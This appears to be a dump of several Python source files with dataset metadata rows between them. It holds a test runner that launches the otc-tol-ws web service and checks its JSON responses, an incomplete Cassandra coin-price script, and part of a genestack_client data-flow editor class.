parser.add_argument('--synthesis-parent', required=True, help='Directory that is the parent of synthesis directories (if there is more than one subdirectory, then there will be multiple trees served - that option is not well tested).')
parser.add_argument('--exe-dir', required=True, help='Directory that holds the otc-tol-ws executable and which will be the working directory of the server.')
parser.add_argument('--tests-parent', required=True, help='Directory. Each subdir that holds a "method.json" file will be interpreted as a test.')
parser.add_argument('--test-name', default=None, required=False, help='Name of a subdir of the tests-parent dir. If provided only that test will be run; otherwise all of the tests will be run.')
parser.add_argument('--server-port', default=1985, type=int, required=False, help='Port number for the server')
parser.add_argument('--server-threads', default=4, type=int, required=False, help='Number of threads for the server')
parser.add_argument('--test-threads', default=8, type=int, required=False, help='Number of threads launched for running tests.')
parser.add_argument('--secs-to-recheck-pid-file', default=0, type=int, required=False, help='If the pid file exists, the process will enter a loop sleeping and rechecking for this number of seconds.')
args = parser.parse_args()
if args.server_threads < 1 or args.test_threads < 1:
sys.exit("The number of threads must be positive.")
taxonomy_dir = args.taxonomy_dir
if not os.path.isdir(taxonomy_dir):
sys.exit('Taxonomy directory "{}" does not exist.\n'.format(taxonomy_dir))
synth_par_path = args.synthesis_parent
if not os.path.isdir(synth_par_path):
sys.exit('Synthetic tree parent directory "{}" does not exist.\n'.format(synth_par_path))
exe_dir = args.exe_dir
if not os.path.isdir(exe_dir):
sys.exit('Executable directory "{}" does not exist.\n'.format(exe_dir))
test_par = args.tests_parent
if not os.path.isdir(test_par):
sys.exit('Tests parent directory "{}" does not exist.\n'.format(test_par))
if args.test_name is not None:
e_dir_list = [args.test_name]
else:
e_dir_list = get_test_dirs_under(test_par)
e_dir_list.sort()
SERVER_PORT = args.server_port
# Get test paths
to_run = []
for e_subdir_name in e_dir_list:
e_path = os.path.join(test_par, e_subdir_name)
if not os.path.isdir(e_path):
sys.stderr.write("Skipping test {} due to missing dir {} \n".format(e_subdir_name, e_path))
continue
mfile = os.path.join(e_path, "method.json")
if not os.path.isfile(mfile):
sys.stderr.write("Skipping test {} due to missing file {}\n".format(e_subdir_name, mfile))
continue
to_run.append(e_path)
if not to_run:
sys.exit("No test were found!")
# Check that there are no PIDfiles in the way
pidfile_path = os.path.join(exe_dir, PIDFILE_NAME)
if os.path.exists(pidfile_path):
recheck = 0
checks_per_sec = 3
while recheck < checks_per_sec*args.secs_to_recheck_pid_file:
recheck += 1
time.sleep(1.0/checks_per_sec)
if not os.path.exists(pidfile_path):
break
if os.path.exists(pidfile_path):
sys.exit("{} is in the way!\n".format(pidfile_path))
# try launching otc-tol-ws and running the tests against it.
for i in range(2):
if launch_server(exe_dir=exe_dir,
taxonomy_dir=taxonomy_dir,
synth_par=synth_par_path,
server_threads=args.server_threads):
try:
num_passed, nf, ne = run_tests(test_par, to_run, args.test_threads)
finally:
kill_server(exe_dir)
NUM_TESTS = nf + ne + num_passed
assert nf == len(FAILED_TESTS)
assert ne == len(ERRORED_TESTS)
sys.stderr.write('Passed {p:d}/{t:d} tests.'.format(p=num_passed, t=NUM_TESTS))
if FAILED_TESTS:
sys.stderr.write(' Failed:\n {}\n'.format('\n '.join(FAILED_TESTS)))
if ERRORED_TESTS:
sys.stderr.write(' Errors in:\n {}\n'.format('\n '.join(ERRORED_TESTS)))
if nf + ne > 0:
sys.exit(nf + ne)
sys.stderr.write('SUCCESS\n')
sys.exit(0)
else:
time.sleep(1) # relaunch (most likely cause is the port not being freed from previous test)
_LOG.error("Server launch failed: ")
with open(os.path.join(exe_dir, SERVER_OUT_ERR_FN), 'r') as seo:
sys.stderr.write(seo.read())
sys.exit(-1)
| 42.377682 | 239 | 0.577172 | #!/usr/bin/env python
import subprocess
import requests
import json
import time
import logging
try:
from Queue import Queue
except:
from queue import Queue
from threading import Thread, RLock
_LOG = logging.getLogger(__name__)
_LOG.setLevel(logging.DEBUG)
_lh = logging.StreamHandler()
_lh.setFormatter(logging.Formatter("[%(asctime)s] %(filename)s (%(lineno)3d): %(levelname) 8s: %(message)s"))
_LOG.addHandler(_lh)
NUM_TESTS = 0
FAILED_TESTS = []
FRAC_FLOAT_DIFF_TOL = 0.001
def _extend_diff_list(diff_list, r):
if r:
if isinstance(r, list):
diff_list.extend(r)
else:
diff_list.append(r)
def gen_dict_diff_str(expected, observed, ex_pref, obs_pref):
    """Recursively diff *expected* against *observed*.

    :param ex_pref: breadcrumb prefix describing *expected* (e.g. ``Expected x["k"]``)
    :param obs_pref: breadcrumb prefix describing *observed*
    :return: None when equal; otherwise a message string or a list of
        message strings (callers normalize via ``_extend_diff_list``).

    Floats are compared with relative tolerance ``FRAC_FLOAT_DIFF_TOL``.
    """
    if expected == observed:
        return None
    diff_list = []
    if isinstance(expected, dict):
        if not isinstance(observed, dict):
            return '{} is a dict, but {} is a {}'.format(ex_pref, obs_pref, type(observed))
        for ek, ev in expected.items():
            if ek in observed:
                ov = observed[ek]
                if ov != ev:
                    matched_as_floats = False
                    if isinstance(ev, float):
                        try:
                            if abs(ev - ov)/abs(ev) <= FRAC_FLOAT_DIFF_TOL:
                                matched_as_floats = True
                        except Exception:
                            # ev == 0 or ov of an incompatible type:
                            # fall through to the exact comparison below.
                            pass
                    if not matched_as_floats:
                        r = gen_dict_diff_str(ev, ov, '{}["{}"]'.format(ex_pref, ek), '{}["{}"]'.format(obs_pref, ek))
                        _extend_diff_list(diff_list, r)
            else:
                diff_list.append('{}["{}"] is absent'.format(obs_pref, ek))
        for k in observed.keys():
            if k not in expected:
                diff_list.append('{}["{}"] was present, but not an expected key'.format(obs_pref, k))
    elif isinstance(expected, list) or isinstance(expected, tuple):
        # BUG FIX: the original condition was
        #   not isinstance(observed, list) or isinstance(observed, tuple)
        # whose precedence made every tuple `observed` report a spurious
        # type mismatch.  A tuple is an acceptable sequence here.
        if not isinstance(observed, (list, tuple)):
            return '{} is a list, but {} is a {}'.format(ex_pref, obs_pref, type(observed))
        if len(expected) != len(observed):
            diff_list.append('{} had {} elements but {} has {}'.format(ex_pref, len(expected), obs_pref, len(observed)))
        else:
            ml = len(expected)
            for ind in range(ml):
                eel, oel = expected[ind], observed[ind]
                if eel != oel:
                    r = gen_dict_diff_str(eel, oel, '{}[{}]'.format(ex_pref, ind), '{}[{}]'.format(obs_pref, ind))
                    _extend_diff_list(diff_list, r)
    elif type(expected) == type(observed):
        return ['{} = {}, but {} = {}'.format(ex_pref, repr(expected), obs_pref, repr(observed))]
    else:
        return ['{} is the {} equal to {}, but {} is a {}'.format(ex_pref, type(expected), repr(expected), obs_pref, type(observed))]
    return diff_list
def gen_expected_obs_diff(expected, observed, tag):
    """Diff with human-readable "Expected <tag>"/"Observed <tag>" prefixes."""
    return gen_dict_diff_str(expected, observed, 'Expected {}'.format(tag), 'Observed {}'.format(tag))
#########################################################################################
# The following code for execution in a non-blocking thread is from pyraphyletic. If
# we moved it to peyotl, we could import it from there (at the cost of making)
# otcetera depend on peyot.
class JobQueue(Queue):
    """Thread-safe Queue that logs the addition of a job to debug"""
    def put(self, item, block=True, timeout=None):
        """Logs `item` at the debug level then calls base-class put.

        `block` now defaults to True to mirror Queue.put.  The previous
        default of None was falsy, and Queue.put treats a falsy `block` as a
        non-blocking put — the opposite of the base-class default.  (For this
        unbounded queue the difference cannot be observed, but the signature
        should not silently invert the inherited semantics.)
        """
        _LOG.debug("%s queued" % str(item))
        Queue.put(self, item, block=block, timeout=timeout)
# Module-level queue shared by all worker threads; jobs are enqueued by
# run_tests() and consumed by worker().
_jobq = JobQueue()
def worker():
    """Infinite loop of getting jobs off of _jobq and performing them.

    Runs forever in a daemon thread (see start_worker).  Exceptions raised by
    a job are logged and swallowed so one bad job cannot take the worker
    down; the loop then moves on to the next job.
    """
    while True:
        job = _jobq.get()
        _LOG.debug('"{}" started'.format(job))
        try:
            job.start()
        except Exception:
            # Despite the historical message, the worker survives and keeps
            # serving subsequent jobs.  Catch Exception (not a bare except)
            # so SystemExit/KeyboardInterrupt are not silently absorbed.
            _LOG.exception("Worker dying.")
        else:
            try:
                job.get_results()
            except Exception:
                _LOG.exception("Worker exception. Error in job.get_results")
        _LOG.debug('"{}" completed'.format(job))
        _jobq.task_done()
# Every worker thread ever launched (threads are never killed; start_worker
# only ever grows this list).
_WORKER_THREADS = []
def start_worker(num_workers):
    """Spawns worker threads such that at least `num_workers` threads will be
    launched for processing jobs in the jobq.

    The only way that you can get more than `num_workers` threads is if you
    have previously called the function with a number > `num_workers`.
    (worker threads are never killed).
    """
    assert num_workers > 0, "A positive number must be passed as the number of worker threads"
    num_currently_running = len(_WORKER_THREADS)
    for i in range(num_currently_running, num_workers):
        _LOG.debug("Launching Worker thread #%d" % i)
        t = Thread(target=worker)
        _WORKER_THREADS.append(t)
        # Use the `daemon` attribute rather than the deprecated setDaemon()
        # so these threads never keep the interpreter alive at exit.
        t.daemon = True
        t.start()
#########################################################################################
# Maps an upper-case HTTP verb name to the corresponding `requests` function.
_verb_name_to_req_method = {"GET": requests.get,
                            "PUT": requests.put,
                            "POST": requests.post,
                            "DELETE": requests.delete,
                            "HEAD": requests.head,
                            "OPTIONS": requests.options,
                            }
# Headers sent with every test request: we always send and expect JSON.
API_HEADERS = {'content-type' : 'application/json',
               'accept' : 'application/json',
               }
class WebServiceTestJob(object):
    """One web-service test: a single HTTP call plus validation of the reply.

    Instances are built by run_tests from a test directory's method.json
    (plus optional expected.json / expected_code.txt), pushed onto the job
    queue, and executed by worker threads via start().  The outcome is
    recorded in the boolean flags `passed`, `failed` and `erred`, and in
    `status_str`; a *non-empty* status_str is also the "job finished" signal
    that the polling loop in run_tests waits for.
    """
    def __init__(self, test_par, test_description, service_prefix):
        """Configures (but does not run) a test job.

        :param test_par: parent directory of all of the tests; used only to
            compute a short relative name for reporting.
        :param test_description: dict derived from a test's method.json with
            required keys "url_fragment" and "arguments", and optional keys
            "verb", "expected_response_payload", "expected_status_code",
            "test_dir" and "name".
        :param service_prefix: base URL of the running service; the full test
            URL is this prefix + url_fragment.
        """
        self.url_fragment = test_description["url_fragment"]
        self.arguments = test_description["arguments"]
        # Verb defaults to GET; a KeyError here means an unsupported verb.
        v = test_description.get("verb", "GET").upper()
        self.requests_method = _verb_name_to_req_method[v]
        self.service_prefix = service_prefix
        self.url = service_prefix + self.url_fragment
        # None means "no expectation" for either of the next two fields.
        self.expected = test_description.get('expected_response_payload')
        self.expected_status = test_description.get('expected_status_code')
        # None until the job runs; run_tests polls this and treats any
        # non-empty string as "job finished".
        self._status_str = None
        self.passed = False
        self.failed = False
        self.erred = False
        self.test_par = test_par
        self.test_dir = test_description.get("test_dir")
        self.test_subdir = os.path.relpath(self.test_dir, self.test_par)
        self.name = test_description.get("name", self.test_subdir or self.url_fragment)
        # Guards _status_str, which is written by a worker thread and read by
        # the main thread's polling loop in run_tests.
        self.stat_lock = RLock()
    @property
    def status_str(self):
        # Thread-safe read; returns None while the job has no status yet.
        with self.stat_lock:
            if self._status_str is None:
                x = None
            else:
                x = str(self._status_str)
        return x
    @status_str.setter
    def status_str(self, value):
        # Thread-safe write (workers set this; the main thread polls it).
        with self.stat_lock:
            self._status_str = value
    def __str__(self):
        return 'WebServiceTestJob {}'.format(self.name)
    def run_ws_test(self):
        """Performs the HTTP call and validates status code and JSON payload.

        Sets `passed`, or `failed` (expectation mismatch), or `erred`
        (unexpected exception), and leaves a human-readable summary in
        status_str.  The '' assigned below only resets state: run_tests
        treats an *empty* status_str as "still running".
        """
        self.status_str = ''
        try:
            # 1. Make the call
            if self.arguments:
                _LOG.debug("{} arguments = {}".format(self.name, repr(self.arguments)))
                response = self.requests_method(self.url, headers=API_HEADERS, data=json.dumps(self.arguments))
            else:
                response = self.requests_method(self.url)
            # 2.A Raise exception if we expected status 200 and didn't get it.
            if self.expected_status == 200:
                try:
                    response.raise_for_status()
                except Exception as sce:
                    _LOG.exception('exception url: {}'.format(self.url))
                    # Best effort: reading response.text can itself raise,
                    # hence the bare except around this status update.
                    try:
                        self.status_str = "Non-200 response body = {}\n".format(response.text)
                    except:
                        pass
                    raise sce
            # 2.B. Record a failure if we expected a specific non-200 code and
            #   got something else (the early return happens below, after 3).
            elif response.status_code != self.expected_status:
                self.failed = True
                try:
                    self.status_str = "Expected status {} but got {}. response body = \n{}\n".format(self.expected_status, response.status_code, response.text)
                except:
                    pass
            # 3. Check JSON body
            _LOG.debug('name: {} Expected: {}'.format(self.name, self.expected))
            if self.expected is not None:
                try:
                    j = response.json()
                except:
                    _LOG.error("{} no JSON in response: {}".format(self.name, response.text))
                    raise
                _LOG.debug('name: {} Observed: {}'.format(self.name, j))
                if j != self.expected:
                    # The diff helper tolerates small float differences (see
                    # FRAC_FLOAT_DIFF_TOL), so unequal payloads may still
                    # produce an empty diff and count as a pass.
                    dd = gen_expected_obs_diff(self.expected, j, 'x')
                    if dd:
                        self.failed = True
                        if self.test_dir:
                            # Save what we actually got next to the test's
                            # inputs to ease debugging / updating expected.json.
                            dbout_observed = os.path.join(self.test_dir, "observed.json")
                            with codecs.open(dbout_observed, 'w', encoding="utf-8") as obsfo:
                                json.dump(j, obsfo, sort_keys=True, indent=2, separators=(',', ': '))
                            m = 'Response written to {}'.format(dbout_observed)
                        else:
                            m = ''
                        self.status_str += "Wrong response:\n{}\n{}".format('\n'.join(dd), m)
            if self.failed:
                return
            else:
                self.passed = True
                self.status_str = "Completed"
        except Exception as x:
            self.erred = True
            _LOG.exception('writing exception to status string')
            self.status_str += "Exception: {}".format(x)
    def start(self):
        """Trigger to start push - blocking"""
        self.run_ws_test()
    def get_results(self):
        """:return self.status_str"""
        return self.status_str
#########################################################################################
# The server writes its PID to this file (inside exe_dir) once it is up;
# launch_server polls for it to detect startup, kill_server removes it.
PIDFILE_NAME = "pidfile.txt"
# subprocess.Popen handle for the launched otc-tol-ws process; set by
# launch_server and consulted/terminated by kill_server.
RUNNING_SERVER = None
SERVER_PORT = 1985 # global, set by CLI. Needed by server launch and threads
# File (inside exe_dir) capturing the server's stdout+stderr; its contents
# are dumped to our stderr if the launch fails.
SERVER_OUT_ERR_FN = "test-server-stdouterr.txt"
def launch_server(exe_dir, taxonomy_dir, synth_par, server_threads=4):
    """Start otc-tol-ws and block until it has written its pidfile.

    Stores the Popen handle in the module-level RUNNING_SERVER.  Returns True
    if the process is still alive and the pidfile appeared; False if the
    process exited before the pidfile was seen.  Raises RuntimeError after
    roughly 10 seconds of waiting with neither outcome.
    """
    global RUNNING_SERVER
    exe_path = os.path.join(exe_dir, 'otc-tol-ws')
    pidfile_path = os.path.join(exe_dir, PIDFILE_NAME)
    server_std_out = os.path.join(exe_dir, SERVER_OUT_ERR_FN)
    invocation = [
        exe_path,
        taxonomy_dir,
        "-D" + synth_par,
        "-p{}".format(pidfile_path),
        "-P{}".format(SERVER_PORT),
        "--num-threads={}".format(server_threads),
    ]
    _LOG.debug('Launching with: "{}"'.format('" "'.join(invocation)))
    # Child inherits the fd, so closing our handle right away is fine.
    with open(server_std_out, 'w') as log_fo:
        RUNNING_SERVER = subprocess.Popen(invocation, stdout=log_fo, stderr=subprocess.STDOUT)
    num_waits = 0
    while RUNNING_SERVER.poll() is None and not os.path.exists(pidfile_path):
        time.sleep(0.1)
        if num_waits > 100:
            raise RuntimeError("Assuming that the server has hung after waiting for pidfile")
        num_waits += 1
    return (RUNNING_SERVER.poll() is None) and os.path.exists(pidfile_path)
def kill_server(exe_dir):
    """Shut down the server launched by launch_server and remove its pidfile.

    Sends SIGTERM first and gives the process a short grace period before
    escalating to SIGKILL; previously kill() was issued immediately after
    terminate(), so a clean shutdown never had a chance.  The pidfile is
    removed only once the process is confirmed dead.  Set the
    PROMPT_BEFORE_KILLING_SERVER environment variable to pause here (e.g. to
    poke the service manually) before the kill.
    """
    if os.environ.get("PROMPT_BEFORE_KILLING_SERVER"):
        # NOTE(review): raw_input implies this script targets Python 2;
        # under Python 3 this line would need to be input(). Confirm.
        raw_input("type any key to kill the server... ")
    pidfile_path = os.path.join(exe_dir, PIDFILE_NAME)
    if RUNNING_SERVER.poll() is None:
        RUNNING_SERVER.terminate()
        # Grace period (~2s) for SIGTERM before escalating.
        for _ in range(20):
            if RUNNING_SERVER.poll() is not None:
                break
            time.sleep(0.1)
        if RUNNING_SERVER.poll() is None:
            RUNNING_SERVER.kill()
        # Wait up to ~10s for the process to actually disappear.
        wc = 0
        while RUNNING_SERVER.poll() is None:
            time.sleep(0.1)
            wc += 1
            if wc > 100:
                break
    if RUNNING_SERVER.poll() is None:
        sys.stderr.write("Could not kill server! Kill it then remove the pidfile.txt\n")
    else:
        if os.path.exists(pidfile_path):
            os.remove(pidfile_path)
        sys.stderr.write("Server no longer running and pidfile removed.\n")
# Names of tests that failed / errored; appended to by run_tests and reported
# (and sanity-checked with asserts) in the __main__ block.
FAILED_TESTS, ERRORED_TESTS = [], []
def run_tests(test_par, dirs_to_run, test_threads):
    """Runs every test in `dirs_to_run` against the local server.

    Each test directory must hold a method.json describing the call; optional
    expected.json and expected_code.txt supply the expected payload and
    status code (status defaults to 200).  Jobs are executed by
    `test_threads` worker threads while this (main) thread polls each job's
    status_str until all have finished.  Names of failing/erring tests are
    appended to the module-level FAILED_TESTS / ERRORED_TESTS lists.

    :param test_par: parent dir of the tests (used for short job names)
    :param dirs_to_run: list of test directory paths
    :param test_threads: number of worker threads to ensure are running
    :return: (num_passed, num_failed, num_errors) tuple of counts
    """
    assert test_threads > 0
    td_list = []
    for test_dir in dirs_to_run:
        with codecs.open(os.path.join(test_dir, "method.json")) as inp:
            td = json.load(inp)
        if os.path.exists(os.path.join(test_dir, "expected.json")):
            with codecs.open(os.path.join(test_dir, "expected.json")) as inp:
                td["expected_response_payload"] = json.load(inp)
        if os.path.exists(os.path.join(test_dir, "expected_code.txt")):
            with codecs.open(os.path.join(test_dir, "expected_code.txt")) as inp:
                lines = inp.readlines()
                td["expected_status_code"] = int(lines[0])
        else:
            td["expected_status_code"] = 200
        td["test_dir"] = test_dir
        td_list.append(td)
    start_worker(test_threads)
    service_prefix = "http://127.0.0.1:{}/".format(SERVER_PORT)
    all_jobs = [WebServiceTestJob(test_par=test_par, test_description=td, service_prefix=service_prefix) for td in td_list]
    running_jobs = list(all_jobs)
    for j in all_jobs:
        _jobq.put(j)
    # now we block until all jobs have a status_str
    num_passed = 0
    num_failed = 0
    num_errors = 0
    while True:
        # Jobs that still lack a non-empty status_str are collected in srj
        # and re-polled on the next sweep; finished jobs are tallied once.
        srj = []
        for j in running_jobs:
            jss = j.status_str
            if not jss:
                # _LOG.debug('putting {} back in queue'.format(j.name))
                srj.append(j)
                continue
            _LOG.debug('test {} status_str = {} resolved'.format(j.name, repr(jss)))
            if j.erred or j.failed:
                if j.failed:
                    fc = "FAILURE"
                    num_failed += 1
                    FAILED_TESTS.append(j.name)
                else:
                    fc = "ERROR"
                    num_errors += 1
                    ERRORED_TESTS.append(j.name)
                _LOG.error("{} {}: {}".format(j.name, fc, j.status_str))
            else:
                num_passed += 1
                _LOG.debug("{} passed.".format(j.name))
        if not srj:
            break
        running_jobs = srj
        time.sleep(0.1)
    return num_passed, num_failed, num_errors
def get_test_dirs_under(top_test_dir):
    """Return the relative path of every subdirectory of `top_test_dir` that
    contains a "method.json" file (i.e. every test directory).

    Results are returned in the reverse of os.walk's top-down order,
    preserving the historical behavior of building the list with
    insert(0, ...) — but via append + reverse, which is O(n) instead of
    O(n^2).  (The __main__ caller sorts the list anyway.)
    """
    test_dirs = [os.path.relpath(root, top_test_dir)
                 for root, dirs, files in os.walk(top_test_dir)
                 if "method.json" in files]
    test_dirs.reverse()
    return test_dirs
if __name__ == '__main__':
    # CLI driver: validate arguments, collect test dirs, launch the server,
    # run the tests against it, then kill the server and report.
    import argparse
    import codecs
    import sys
    import os
    parser = argparse.ArgumentParser(description="Runs the otc-tol-ws and tests described in method.json files")
    parser.add_argument('--taxonomy-dir', required=True, help='Directory that is the parent of the taxonomy files')
    parser.add_argument('--synthesis-parent', required=True, help='Directory that is the parent of synthesis directories (if there is more than one subdirectory, then there will be multiple trees served - that option is not well tested).')
    parser.add_argument('--exe-dir', required=True, help='Directory that holds the otc-tol-ws executable and which will be the working directory of the server.')
    parser.add_argument('--tests-parent', required=True, help='Directory. Each subdir that holds a "method.json" file will be interpreted as a test.')
    parser.add_argument('--test-name', default=None, required=False, help='Name of a subdir of the tests-parent dir. If provided only that test will be run; otherwise all of the tests will be run.')
    parser.add_argument('--server-port', default=1985, type=int, required=False, help='Port number for the server')
    parser.add_argument('--server-threads', default=4, type=int, required=False, help='Number of threads for the server')
    parser.add_argument('--test-threads', default=8, type=int, required=False, help='Number of threads launched for running tests.')
    parser.add_argument('--secs-to-recheck-pid-file', default=0, type=int, required=False, help='If the pid file exists, the process will enter a loop sleeping and rechecking for this number of seconds.')
    args = parser.parse_args()
    # Validate numeric and directory arguments before doing any real work.
    if args.server_threads < 1 or args.test_threads < 1:
        sys.exit("The number of threads must be positive.")
    taxonomy_dir = args.taxonomy_dir
    if not os.path.isdir(taxonomy_dir):
        sys.exit('Taxonomy directory "{}" does not exist.\n'.format(taxonomy_dir))
    synth_par_path = args.synthesis_parent
    if not os.path.isdir(synth_par_path):
        sys.exit('Synthetic tree parent directory "{}" does not exist.\n'.format(synth_par_path))
    exe_dir = args.exe_dir
    if not os.path.isdir(exe_dir):
        sys.exit('Executable directory "{}" does not exist.\n'.format(exe_dir))
    test_par = args.tests_parent
    if not os.path.isdir(test_par):
        sys.exit('Tests parent directory "{}" does not exist.\n'.format(test_par))
    # Either run the single named test, or discover all tests under test_par.
    if args.test_name is not None:
        e_dir_list = [args.test_name]
    else:
        e_dir_list = get_test_dirs_under(test_par)
        e_dir_list.sort()
    SERVER_PORT = args.server_port
    # Get test paths
    to_run = []
    for e_subdir_name in e_dir_list:
        e_path = os.path.join(test_par, e_subdir_name)
        if not os.path.isdir(e_path):
            sys.stderr.write("Skipping test {} due to missing dir {} \n".format(e_subdir_name, e_path))
            continue
        mfile = os.path.join(e_path, "method.json")
        if not os.path.isfile(mfile):
            sys.stderr.write("Skipping test {} due to missing file {}\n".format(e_subdir_name, mfile))
            continue
        to_run.append(e_path)
    if not to_run:
        sys.exit("No test were found!")
    # Check that there are no PIDfiles in the way
    pidfile_path = os.path.join(exe_dir, PIDFILE_NAME)
    if os.path.exists(pidfile_path):
        # A leftover pidfile may belong to a previous run that is still
        # shutting down; optionally wait for it to disappear.
        recheck = 0
        checks_per_sec = 3
        while recheck < checks_per_sec*args.secs_to_recheck_pid_file:
            recheck += 1
            time.sleep(1.0/checks_per_sec)
            if not os.path.exists(pidfile_path):
                break
        if os.path.exists(pidfile_path):
            sys.exit("{} is in the way!\n".format(pidfile_path))
    # try launching otc-tol-ws and running the tests against it.
    # The launch is attempted twice; on success we report and exit from
    # inside the loop, so falling out of the loop means both launches failed.
    for i in range(2):
        if launch_server(exe_dir=exe_dir,
                         taxonomy_dir=taxonomy_dir,
                         synth_par=synth_par_path,
                         server_threads=args.server_threads):
            try:
                num_passed, nf, ne = run_tests(test_par, to_run, args.test_threads)
            finally:
                kill_server(exe_dir)
            NUM_TESTS = nf + ne + num_passed
            assert nf == len(FAILED_TESTS)
            assert ne == len(ERRORED_TESTS)
            sys.stderr.write('Passed {p:d}/{t:d} tests.'.format(p=num_passed, t=NUM_TESTS))
            if FAILED_TESTS:
                sys.stderr.write(' Failed:\n {}\n'.format('\n '.join(FAILED_TESTS)))
            if ERRORED_TESTS:
                sys.stderr.write(' Errors in:\n {}\n'.format('\n '.join(ERRORED_TESTS)))
            # Exit status is the number of failing/erring tests (0 = success).
            if nf + ne > 0:
                sys.exit(nf + ne)
            sys.stderr.write('SUCCESS\n')
            sys.exit(0)
        else:
            time.sleep(1) # relaunch (most likely cause is the port not being freed from previous test)
    _LOG.error("Server launch failed: ")
    with open(os.path.join(exe_dir, SERVER_OUT_ERR_FN), 'r') as seo:
        sys.stderr.write(seo.read())
    sys.exit(-1)
| 10,883 | 387 | 183 |
76e4e379bdb364fc335472dd11b27d14c6dc3696 | 1,572 | py | Python | coinds/cassandra/poll_coins.py | skwongg/coins | fe9840cdee6bdf10854d5312e6fc52154c081dfc | [
"MIT"
] | 1 | 2018-03-06T01:59:57.000Z | 2018-03-06T01:59:57.000Z | coinds/cassandra/poll_coins.py | skwongg/coins | fe9840cdee6bdf10854d5312e6fc52154c081dfc | [
"MIT"
] | 2 | 2020-06-05T17:07:09.000Z | 2021-06-10T18:10:16.000Z | coinds/cassandra/poll_coins.py | skwongg/coins | fe9840cdee6bdf10854d5312e6fc52154c081dfc | [
"MIT"
] | null | null | null | from cassandra.cluster import Cluster
from cassandra.cqlengine import connection
from cassandra.cqlengine.management import sync_table
from coins import Coin
CQLENG_ALLOW_SCHEMA_MANAGEMENT='CQLENG_ALLOW_SCHEMA_MANAGEMENT'
cluster=Cluster()
connection.setup(['127.0.0.1'], "cassy", protocol_version=3)
class CoinPrice
a = Coin()
##Cassandra coin model syncs to default cassandra connection under cassy keyspace.
##row key for time series data https://academy.datastax.com/resources/getting-started-time-series-data-modeling
#row partitioning:
# In some cases, the amount of data gathered for a single device isn’t practical to fit onto a single row. Cassandra can store up to 2 billion columns per row, but if we’re storing data every millisecond you wouldn’t even get a month’s worth of data. The solution is to use a pattern called row partitioning by adding data to the row key to limit the amount of columns you get per device. Using data already available in the event, we can use the date portion of the timestamp and add that to the weather station id. This will give us a row per day, per weather station, and an easy way to find the data. (figure 2)
# day = datetime.date.today().strftime('%m-%d-%Y')
# name = "XRP"
# ticker="XRPUSD"
# pair="XRPUSD"
# icon_url="https://www.google.com"
# price="0.8934"
# price=0.8934
# btc_price=0.00001
# created_at=datetime.datetime.now()
# source = "binance"
# a = Coin.create(day=day, name=name, ticker=ticker, pair=pair, icon_url=icon_url, price=price, btc_price=btc_price, source="binance", created_at=created_at)
| 46.235294 | 615 | 0.771628 | from cassandra.cluster import Cluster
from cassandra.cqlengine import connection
from cassandra.cqlengine.management import sync_table
from coins import Coin
CQLENG_ALLOW_SCHEMA_MANAGEMENT='CQLENG_ALLOW_SCHEMA_MANAGEMENT'
cluster=Cluster()
connection.setup(['127.0.0.1'], "cassy", protocol_version=3)
class CoinPrice
a = Coin()
##Cassandra coin model syncs to default cassandra connection under cassy keyspace.
##row key for time series data https://academy.datastax.com/resources/getting-started-time-series-data-modeling
#row partitioning:
# In some cases, the amount of data gathered for a single device isn’t practical to fit onto a single row. Cassandra can store up to 2 billion columns per row, but if we’re storing data every millisecond you wouldn’t even get a month’s worth of data. The solution is to use a pattern called row partitioning by adding data to the row key to limit the amount of columns you get per device. Using data already available in the event, we can use the date portion of the timestamp and add that to the weather station id. This will give us a row per day, per weather station, and an easy way to find the data. (figure 2)
# day = datetime.date.today().strftime('%m-%d-%Y')
# name = "XRP"
# ticker="XRPUSD"
# pair="XRPUSD"
# icon_url="https://www.google.com"
# price="0.8934"
# price=0.8934
# btc_price=0.00001
# created_at=datetime.datetime.now()
# source = "binance"
# a = Coin.create(day=day, name=name, ticker=ticker, pair=pair, icon_url=icon_url, price=price, btc_price=btc_price, source="binance", created_at=created_at)
| 0 | 0 | 0 |
b1edd974dc7790b129ef197cf1042e0dc3dc1c81 | 3,695 | py | Python | genestack_client/data_flow_editor.py | genestack/python-client | 083eb0508dc99c7575ba7f115595f2535f007583 | [
"MIT"
] | 2 | 2017-08-30T22:32:59.000Z | 2021-07-20T10:08:23.000Z | genestack_client/data_flow_editor.py | genestack/python-client | 083eb0508dc99c7575ba7f115595f2535f007583 | [
"MIT"
] | 58 | 2015-10-19T08:36:00.000Z | 2020-12-07T13:48:17.000Z | genestack_client/data_flow_editor.py | genestack/python-client | 083eb0508dc99c7575ba7f115595f2535f007583 | [
"MIT"
] | 6 | 2015-10-21T21:43:45.000Z | 2021-01-06T20:33:53.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import *
from genestack_client import Application, FilesUtil, GenestackException, Metainfo
| 39.308511 | 118 | 0.661434 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import *
from genestack_client import Application, FilesUtil, GenestackException, Metainfo
class DataFlowEditor(Application):
APPLICATION_ID = 'genestack/datafloweditor'
def __init__(self, connection, application_id=None):
Application.__init__(self, connection, application_id)
self.__cache = {}
def create_dataflow(self, accession, name=None):
"""
Creates a data flow based on the file provenance of the specified file.
The nodes of the data flow can be accessed by the accession of the corresponding files in the file provenance.
:param accession: file accession
:type accession: str
:param name: data flow name
:type name: str
:return: accession of the created data flow file
:rtype: str
:raise GenestackException:
"""
response = self.invoke('initializeApplicationState', 'createFromSources', accession)
if response['type'] == 'newPage':
accession = response['fileInfo']['accession']
elif response['type'] == 'existingPages':
# If file already exists we expect to get the last created file.
# Existing page contains files from first to last (or MAX QUERY)
# TODO: in case there are more files then MAX QUERY (100 ATM),
# the last file in response will not be really last
# (it is almost impossible use case, though)
file_info = response['fileInfos'][-1]
accession = file_info['accession']
else:
raise GenestackException("Unknown response type: %s" % response['type'])
if name:
FilesUtil(self.connection).replace_metainfo_string_value([accession], Metainfo.NAME, name)
return accession
def add_files(self, page_accession, node_accession, files):
"""
Add files to a data flow node.
:param page_accession: accession of data flow file
:type page_accession: str
:param node_accession: accession of origin file in node
:type node_accession: str
:param files: list of accessions of files to add to the node
:type files: list
:rtype: None
"""
node = self.__get_node_by_accession(page_accession, node_accession)
self.invoke('addFiles', files, node, page_accession)
def clear_node(self, page_accession, node_accession):
"""
Remove all files from a data flow node.
:param page_accession: accession of data flow file
:type page_accession: str
:param node_accession: accession of origin file in node
:type node_accession: str
:rtype: None
"""
node = self.__get_node_by_accession(page_accession, node_accession)
